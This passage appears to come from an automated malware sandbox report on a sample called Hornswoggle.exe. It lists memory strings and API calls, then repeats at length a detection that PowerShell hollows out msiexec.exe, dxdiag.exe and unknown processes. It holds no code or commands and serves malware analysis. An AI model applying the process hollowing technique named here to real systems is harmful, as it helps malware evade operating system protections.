Source: SIHClient.exe, 00000004.00000003.2215080804.000001FC9AF34000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2215045691.000001FC9AEE7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2593031536.000001FC9AF34000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2592787467.000001FC9AEE4000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2216488728.000001FC9AF34000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000002.2593736915.000001FC9AF34000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000002.2593736915.000001FC9AEE4000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2215971226.000001FC9AF34000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2214710691.000001FC9AF34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.4490278168.00000000057C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\jq
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Users\user\Desktop\Hornswoggle.exe

API call chain: ExitProcess graph end node

graph_0-3488

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_00F1D4F0 LdrInitializeThunk,

2_2_00F1D4F0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
